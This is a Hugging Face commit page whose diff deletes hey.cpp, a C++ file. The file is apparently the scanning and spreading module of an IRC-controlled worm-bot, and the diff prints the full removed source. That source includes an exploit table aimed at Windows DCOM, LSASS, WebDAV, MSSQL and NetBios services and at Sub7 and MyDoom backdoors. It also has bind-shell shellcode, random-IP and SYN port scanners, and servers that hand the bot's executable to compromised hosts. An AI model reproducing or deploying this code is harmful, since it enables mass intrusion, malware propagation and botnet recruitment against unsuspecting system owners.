Hugging Face's logo

webtest1s
/
sss

Model card Files
xet
Community
webtest1s commited on
Commit
89494b2
·
1 Parent(s): acf65fa

Delete hey.cpp

Browse files
Files changed (1) hide show
  1. hey.cpp +0 -603
hey.cpp DELETED
@@ -1,603 +0,0 @@
1
- #include "includes.h"
2
- #include "functions.h"
3
- #include "externs.h"
4
-
5
- // globals
6
- ADVINFO advinfo[MAXTHREADS];
7
- CRITICAL_SECTION CriticalSection;
8
-
9
- EXPLOIT exploit[]={
10
- #ifndef NO_WEBDAV
11
- {"webdav", "WebDav", 80, webdav, 0, TRUE, FALSE},
12
- #endif
13
- #ifndef NO_NETBIOS
14
- {"netbios", "NetBios", 139, NetBios, 0, FALSE, FALSE},
15
- {"ntpass", "NTPass", 445, NetBios, 0, FALSE, FALSE},
16
- #endif
17
- #ifndef NO_DCOM
18
- {"dcom135", "Dcom135", 135, dcom, 0, TRUE, FALSE},
19
- {"dcom445", "Dcom445", 445, dcom, 0, TRUE, FALSE},
20
- {"dcom1025", "Dcom1025", 1025, dcom, 0, TRUE, FALSE},
21
- #endif
22
- #ifndef NO_DCOM2
23
- {"dcom2", "Dcom2", 135, dcom2, 0, TRUE, FALSE},
24
- #endif
25
- {"WksSvc", "WksSvc", 135, WksSvc, 0, TRUE, FALSE},
26
- #ifndef NO_IIS5SSL
27
- {"iis5ssl", "IIS5SSL", 443, IIS5SSL, 0, TRUE, FALSE},
28
- #endif
29
- #ifndef NO_MSSQL
30
- {"mssql", "MSSQL", 1433, MSSQL, 0, TRUE, FALSE},
31
- #endif
32
- #ifndef NO_BEAGLE
33
- {"beagle1", "Beagle1", 2745, Beagle, 0, FALSE, TRUE},
34
- {"beagle2", "Beagle2", 2745, Beagle, 0, FALSE, TRUE},
35
- #endif
36
- #ifndef NO_MYDOOM
37
- {"mydoom", "MyDoom", 3127, MyDoom, 0, FALSE, FALSE},
38
- #endif
39
- #ifndef NO_LSASS
40
- {"lsass_445", "lsass_445", 445, lsass, 0, TRUE, TRUE},
41
- {"lsass_135", "lsass_135", 135, lsass, 0, TRUE, TRUE},
42
- {"lsass_139", "lsass_139", 139, lsass, 0, TRUE, TRUE},
43
- #endif
44
- #ifndef NO_LSASS2
45
- {"lsass2", "lsass2", 445, lsass, 0, TRUE, TRUE},
46
- #endif
47
- #ifndef NO_OPTIX
48
- {"optix", "Optix", 3140, Optix, 0, FALSE, FALSE},
49
- #endif
50
- #ifndef NO_UPNP
51
- {"upnp", "UPNP", 5000, upnp, 0, FALSE, TRUE},
52
- #endif
53
- #ifndef NO_NETDEVIL
54
- {"netdevil","NetDevil", 903, NetDevil, 0, FALSE, FALSE},
55
- #endif
56
- #ifndef NO_DAMEWARE
57
- {"DameWare", "DameWare", 6129, DameWare, 0, FALSE, TRUE},
58
- #endif
59
- #ifndef NO_KUANG2
60
- {"kuang2", "Kuang2", 17300, Kuang, 0, FALSE, FALSE},
61
- #endif
62
- #ifndef NO_SUB7
63
- {"sub7", "Sub7", 27347, Sub7, 0, FALSE, FALSE},
64
- #endif
65
- {NULL, NULL, 0, NULL, 0, FALSE, FALSE}
66
- };
67
-
68
- SCANALL scanall[]={
69
- {"lsass_445", true},
70
- {"lsass2", true},
71
- {"lsass_135", true},
72
- {"lsass_139", true},
73
- {"dcom135", true},
74
- {NULL, false}
75
- };
76
-
77
- // credits to PhaTTy for this :)
78
- char shellcode[] = //bind port 1981
79
- "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA"
80
- "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
81
- "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
82
- "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
83
- "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
84
- "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
85
- "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
86
- "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
87
- "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
88
- "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
89
- "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66"
90
- "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3"
91
- "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66"
92
- "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B"
93
- "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99"
94
- "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5"
95
- "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71"
96
- "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32"
97
- "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6"
98
- "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9"
99
- "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA"
100
- "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8"
101
- "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC"
102
- "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8"
103
- "\xFA\xFA\xFC\xE9\xED\x99";
104
-
105
- void ListExploitStats(SOCKET sock, char *chan, BOOL notice)
106
- {
107
- char buffer[IRCLINE], buffer2[IRCLINE];
108
-
109
- int extotal = 0;
110
-
111
- sprintf(buffer, "[SCAN]: Exploit Statistics:");
112
- for(int i=0; exploit[i].port != 0; i++) {
113
- extotal += exploit[i].stats;
114
- sprintf(buffer2," %s: %d,",exploit[i].name,exploit[i].stats);
115
- strncat(buffer, buffer2, sizeof(buffer));
116
- }
117
- sprintf(buffer2, " Total: %d in %s.", extotal, Uptime(started));
118
- strncat(buffer, buffer2, sizeof(buffer));
119
-
120
- irc_privmsg(sock, chan, buffer, notice);
121
- addlog(buffer);
122
-
123
- return;
124
- }
125
-
126
- void currentIP(SOCKET sock, char *chan, BOOL notice, int threadnum)
127
- {
128
- char sendbuf[IRCLINE];
129
-
130
- if (findthreadid(SCAN_THREAD) > 0) {
131
- IN_ADDR in;
132
- in.s_addr = advinfo[threadnum].ip;
133
-
134
- sprintf(sendbuf, "[SCAN]: Current IP: %s.",finet_ntoa(in));
135
- } else
136
- sprintf(sendbuf ,"[SCAN]: Scan not active.");
137
-
138
- irc_privmsg(sock, chan, sendbuf, notice);
139
- addlog(sendbuf);
140
-
141
- return;
142
- }
143
-
144
- void CheckServers(ADVSCAN scan)
145
- {
146
- char sendbuf[IRCLINE];
147
-
148
- DWORD id;
149
-
150
- if(scan.exploit != -1) {
151
- if (exploit[scan.exploit].tftp) {
152
- #ifndef NO_TFTPD
153
- if (findthreadid(TFTP_THREAD) == 0) {
154
- static TFTP tftp;
155
- tftp.port = tftpport;
156
- tftp.threads = 0;
157
- GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));
158
- strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
159
- tftp.sock=scan.sock;
160
- tftp.notice = scan.notice;
161
- if (scan.msgchan[0] == '\0') {
162
- strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
163
- tftp.silent = TRUE;
164
- } else {
165
- strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
166
- tftp.silent = FALSE;
167
- }
168
-
169
- sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
170
- tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
171
- if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
172
- while (tftp.gotinfo == FALSE)
173
- Sleep(50);
174
- } else
175
- sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError());
176
-
177
- addlog(sendbuf);
178
- #endif
179
- #ifndef NO_FTPD
180
- //
181
- static FTP ftp;
182
- //ftp.port = FTP_PORT;
183
- ftp.threads = 0;
184
- GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
185
- strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
186
- ftp.sock=scan.sock;
187
- ftp.notice = scan.notice;
188
- if (scan.msgchan[0] == '\0') {
189
- strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
190
- ftp.silent = TRUE;
191
- } else {
192
- strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
193
- ftp.silent = FALSE;
194
- }
195
-
196
- sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
197
- ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
198
- if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
199
- while (ftp.gotinfo == FALSE)
200
- Sleep(50);
201
- } else
202
- sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError());
203
-
204
- addlog(sendbuf);
205
- //
206
- #endif
207
- }
208
- } else if (exploit[scan.exploit].http) {
209
- if (findthreadid(HTTP_THREAD) == 0) {
210
- static HTTPD httpd;
211
-
212
- char *c;
213
- GetModuleFileName(0,httpd.dir,sizeof(httpd.dir));
214
- if ((c=strrchr(httpd.dir,'\\')) != NULL)
215
- *c='\0';
216
- httpd.port = httpport;
217
- httpd.enabled = FALSE;
218
- sprintf(httpd.chan, scan.chan);
219
- httpd.sock = scan.sock;
220
- httpd.notice = scan.notice;
221
- httpd.silent = scan.silent;
222
-
223
- sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir);
224
-
225
- httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL);
226
- if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) {
227
- while(httpd.info == FALSE)
228
- Sleep(50);
229
- } else
230
- sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError());
231
-
232
- addlog(sendbuf);
233
- }
234
- }
235
- }
236
-
237
- return;
238
- }
239
-
240
- unsigned long AdvGetNextIP(int threadnum)
241
- {
242
- DWORD host;
243
-
244
- memcpy(&host, &advinfo[threadnum].ip, 4);
245
- host = fntohl(host);
246
- host += 1;
247
- host = fhtonl(host);
248
- memcpy(&advinfo[threadnum].ip, &host, 4);
249
-
250
- return (advinfo[threadnum].ip);
251
- }
252
-
253
- unsigned long AdvGetNextIPRandom(char *scanmask, int threadnum)
254
- {
255
- int ip1=-1,ip2=-1,ip3=-1,ip4=-1;
256
-
257
- if (strlen(scanmask) > 15)
258
- return 0;
259
-
260
- sscanf(scanmask,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
261
- if (ip1==-1) ip1=rand();
262
- if (ip2==-1) ip2=rand();
263
- if (ip3==-1) ip3=rand();
264
- if (ip4==-1) ip4=rand();
265
-
266
- advinfo[threadnum].ip = (ip1+(ip2<<8)+(ip3<<16)+(ip4<<24));
267
-
268
- return (advinfo[threadnum].ip);
269
- }
270
-
271
- BOOL AdvPortOpen(unsigned long ip, unsigned int port, unsigned int delay)
272
- {
273
- SOCKADDR_IN sin;
274
- unsigned long blockcmd=1;
275
-
276
- SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
277
- if (sock == INVALID_SOCKET)
278
- return FALSE;
279
-
280
- sin.sin_family = AF_INET;
281
- sin.sin_addr.S_un.S_addr = ip;
282
- sin.sin_port = fhtons((unsigned short)port);
283
- fioctlsocket(sock,FIONBIO,&blockcmd);
284
- fconnect(sock,(LPSOCKADDR)&sin,sizeof(sin));
285
-
286
- TIMEVAL timeout;
287
- timeout.tv_sec=delay;
288
- timeout.tv_usec=0;
289
- FD_SET rset;
290
- FD_ZERO(&rset);
291
- FD_SET(sock,&rset);
292
-
293
- int i = fselect(0,0,&rset,0,&timeout);
294
- fclosesocket(sock);
295
-
296
- if (i<=0)
297
- return FALSE;
298
- else
299
- return TRUE;
300
- }
301
-
302
- BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
303
- {
304
- char buffer[LOGLINE];
305
- int size;
306
-
307
- unsigned short src_port = 9801;
308
-
309
- TCPHEADER2 send_tcp;
310
- send_tcp.source = fhtons(src_port);
311
- send_tcp.dest = fhtons((unsigned short)port);
312
- send_tcp.seq = rand();
313
- send_tcp.ack_seq = 0;
314
- send_tcp.res1 = 0;
315
- send_tcp.res2 = 0;
316
- send_tcp.doff = 5;
317
- send_tcp.fin = 0;
318
- send_tcp.syn = 1; /*This is the important part..;) */
319
- send_tcp.rst = 0;
320
- send_tcp.psh = 0;
321
- send_tcp.ack = 0;
322
- send_tcp.urg = 0;
323
- send_tcp.window = fhtons(512);
324
- send_tcp.check = 0;
325
- send_tcp.urg_ptr = 0;
326
-
327
- PSDHEADER psdheader;
328
- psdheader.saddr = src_ip;
329
- psdheader.daddr = dest_ip;
330
- psdheader.zero = 0;
331
- psdheader.proto = IPPROTO_TCP;
332
- psdheader.length = fhtons(sizeof(send_tcp));
333
-
334
- memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
335
- send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));
336
-
337
- SOCKADDR_IN ssin;
338
- memset(&ssin,0,sizeof(ssin));
339
- ssin.sin_family = AF_INET;
340
- ssin.sin_port = fhtons((unsigned short)port);
341
- ssin.sin_addr.s_addr = dest_ip;
342
- int ssin_len = sizeof(ssin);
343
-
344
- SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
345
- if (tcp_sock == INVALID_SOCKET) {
346
- addlog("socket open failed");
347
- return FALSE;
348
- }
349
-
350
- // 10022: WSAEINVAL - An invalid argument was supplied.
351
- if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
352
- sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
353
- addlog(buffer);
354
- fclosesocket(tcp_sock);
355
- return FALSE;
356
- }
357
-
358
- RECVHEADER recv_tcp;
359
- memset (&recv_tcp,'\0',sizeof(recv_tcp));
360
- while (recv_tcp.tcp.dest != src_port) {
361
- if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
362
- addlog("recvfrom() socket failed");
363
- fclosesocket(tcp_sock);
364
- return FALSE;
365
- }
366
- }
367
-
368
- fclosesocket(tcp_sock);
369
- if (recv_tcp.tcp.syn == 1) {
370
- addlog("Socket open.");
371
-
372
- return TRUE;
373
- } else {
374
- addlog("Socket closed.");
375
- return FALSE;
376
- }
377
- }
378
-
379
- DWORD WINAPI AdvPortScanner(LPVOID param)
380
- {
381
- IN_ADDR in;
382
- char logbuf[LOGLINE];
383
-
384
- ADVSCAN scan = *((ADVSCAN *)param);
385
- ADVSCAN *scanp = (ADVSCAN *)param;
386
- scanp->cgotinfo = TRUE;
387
-
388
- int threadnum=scan.cthreadnum;
389
- int threadid=scan.cthreadid;
390
-
391
- srand(GetTickCount());
392
- while (advinfo[threads[threadnum].parent].info) {
393
- DWORD dwIP;
394
-
395
- if (scan.random)
396
- dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
397
- else
398
- dwIP = AdvGetNextIP(threads[threadnum].parent);
399
- in.s_addr = dwIP;
400
-
401
- sprintf(logbuf,"[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
402
- finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
403
- sprintf(threads[threadnum].name, logbuf);
404
-
405
- if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
406
- //if (SynPortOpen(finet_addr(GetIP(scan.sock)), dwIP, scan.port, scan.delay) == TRUE) {
407
- if (scan.exploit == -1) {
408
- EnterCriticalSection(&CriticalSection);
409
-
410
- sprintf(logbuf,"[SCAN]: IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
411
- if (!scan.silent) {
412
- if (scan.msgchan[0] != '\0')
413
- irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
414
- else
415
- irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
416
- }
417
- addlog(logbuf);
418
-
419
- LeaveCriticalSection(&CriticalSection);
420
- } else {
421
- EXINFO exinfo;
422
-
423
- sprintf(exinfo.ip, finet_ntoa(in));
424
- sprintf(exinfo.command, exploit[scan.exploit].command);
425
- if (scan.msgchan[0] != '\0')
426
- sprintf(exinfo.chan, scan.msgchan);
427
- else
428
- sprintf(exinfo.chan, scan.chan);
429
- exinfo.sock = scan.sock;
430
- exinfo.notice = scan.notice;
431
- exinfo.silent = scan.silent;
432
- exinfo.port = scan.port;
433
- exinfo.threadnum = threadnum;
434
- exinfo.exploit = scan.exploit;
435
- exploit[scan.exploit].exfunc(exinfo);
436
- /*if (exploit[scan.exploit].exfunc(exinfo)) {
437
- EnterCriticalSection(&CriticalSection);
438
-
439
- sprintf(logbuf,"[SCAN]: Finished with IP: %s, Port %d.",finet_ntoa(in),scan.port);
440
- irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
441
- addlog(logbuf);
442
-
443
- LeaveCriticalSection(&CriticalSection);
444
- } else {
445
- EnterCriticalSection(&CriticalSection);
446
-
447
- sprintf(logbuf,"[SCAN]: Failed to exploit IP: %s, Port %d.",finet_ntoa(in),scan.port);
448
- irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
449
- addlog(logbuf);
450
-
451
- LeaveCriticalSection(&CriticalSection);
452
- }*/
453
-
454
- }
455
- }
456
- Sleep(2000);
457
- }
458
- clearthread(threadnum);
459
-
460
- ExitThread(0);
461
- }
462
-
463
- DWORD WINAPI AdvScanner(LPVOID param)
464
- {
465
- char buffer[LOGLINE];
466
- //char szSelfExe[MAX_PATH];
467
-
468
- ADVSCAN scan = *((ADVSCAN *)param);
469
- ADVSCAN *scanp = (ADVSCAN *)param;
470
- scanp->gotinfo = TRUE;
471
- advinfo[scan.threadnum].ip = finet_addr(scan.ip);
472
- /*
473
- // FIX ME: Make this a standalone function
474
- if (!FileExists(szLocalPayloadFile)) {
475
- GetModuleFileName(0,szSelfExe,MAX_PATH);
476
- CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
477
- // FIX ME: Make this copy to the same directory (could affect other stuff)
478
- }
479
- */
480
- CheckServers(scan);
481
-
482
- if (findthreadid(SCAN_THREAD) == 1) {
483
- DeleteCriticalSection(&CriticalSection); // just in case
484
-
485
- if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
486
- // failed to initialize CriticalSection
487
- sprintf(buffer,"[SCAN]: Failed to initialize critical section.");
488
- if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
489
- addlog(buffer);
490
-
491
- return 0;
492
- }
493
- }
494
-
495
- advinfo[scan.threadnum].info = TRUE;
496
- for (unsigned int i=1;i<=(scan.threads);i++) {
497
- scan.cthreadid = i;
498
- sprintf(buffer,"[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
499
- scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
500
- threads[scan.cthreadnum].parent = scan.threadnum;
501
- if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
502
- while (scan.cgotinfo == FALSE)
503
- Sleep(30);
504
- } else {
505
- sprintf(buffer, "[SCAN]: Failed to start worker thread, error: <%d>.", GetLastError());
506
- addlog(buffer);
507
- }
508
-
509
- Sleep(30);
510
- }
511
-
512
- if (scan.minutes != 0)
513
- Sleep(60000*scan.minutes);
514
- else
515
- while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
516
-
517
- IN_ADDR in;
518
- in.s_addr = advinfo[scan.threadnum].ip;
519
- sprintf(buffer,"[SCAN]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
520
- if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
521
- addlog(buffer);
522
-
523
- advinfo[scan.threadnum].info = FALSE;
524
- Sleep(3000);
525
-
526
- if (findthreadid(SCAN_THREAD) == 1)
527
- DeleteCriticalSection(&CriticalSection);
528
-
529
- clearthread(scan.threadnum);
530
-
531
- ExitThread(0);
532
- }
533
-
534
- /* -- test code xwarlordx
535
- DWORD WINAPI ADVHttpdScanner(EXINFO exinfo)
536
- {
537
- char target[512],request[1024],*start,buffer[1024];
538
- SOCKET sSock;
539
- SOCKADDR_IN sin;
540
- DWORD nb;
541
- fd_set fd_struct;
542
- timeval timeout = {1, 0};
543
- unsigned int n,d;
544
-
545
- strcpy(target, (char *)exinfo.ip);
546
- sprintf(request, "GET HTTP/1.1\r\nConnection: Keep-Alive Accept\r\n\r\n");
547
- sSock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
548
- sin.sin_family = AF_INET;
549
- sin.sin_port = fhtons(exinfo.port);
550
- sin.sin_addr.s_addr = finet_addr(exinfo.ip);
551
- nb = 1;
552
- if (fconnect(sSock, (const sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
553
- {
554
- fsend(sSock, request, lstrlen(request), 0);
555
- fioctlsocket(sSock, FIONBIO, &nb);
556
- FD_ZERO(&fd_struct);
557
- FD_SET(sSock, &fd_struct);
558
- if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
559
-
560
- if((n = read(sSock, buffer, sizeof(buffer) - 1)) < 0) return NULL;
561
- for (d=0;d<n;d++) if (!strncmp(buffer+d,"Server: ",strlen("Server: ")))
562
- {
563
- start=buffer+d+strlen("Server: ");
564
- for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
565
- }
566
- // FIXME: make this as a list with returns pointing to there exploit.
567
- if (lstrcmpi(start, "Apache") == 0)
568
-
569
- {
570
-
571
- // the call to the exploit...
572
- }
573
- }
574
- }
575
- fclosesocket(sSock);
576
- return 0;
577
- }
578
- */
579
-
580
- /*
581
- void DelPayloadFile(SOCKET sock, char *chan, BOOL notice, BOOL silent)
582
- {
583
- char sendbuf[IRCLINE];
584
-
585
- if (findthreadid(SCAN_THREAD) > 0)
586
- sprintf(sendbuf ,"[SCAN]: Scanner is running. Could not delete payload file.");
587
- else {
588
- if (GetFileAttributes(szLocalPayloadFile) != INVALID_FILE_ATTRIBUTES) {
589
- SetFileAttributes(szLocalPayloadFile,FILE_ATTRIBUTE_NORMAL);
590
-
591
- if (DeleteFile(szLocalPayloadFile))
592
- sprintf(sendbuf,"[SCAN]: Removed payload file: '%s'.", szLocalPayloadFile);
593
- else
594
- sprintf(sendbuf,"[SCAN]: Failed to remove payload file: '%s'.", szLocalPayloadFile);
595
- } else
596
- sprintf(sendbuf,"[SCAN]: Payload file: '%s' does not exist.", szLocalPayloadFile);
597
- }
598
- if (!silent) irc_privmsg(sock,chan,sendbuf,notice);
599
- addlog(sendbuf);
600
-
601
- return;
602
- }
603
- */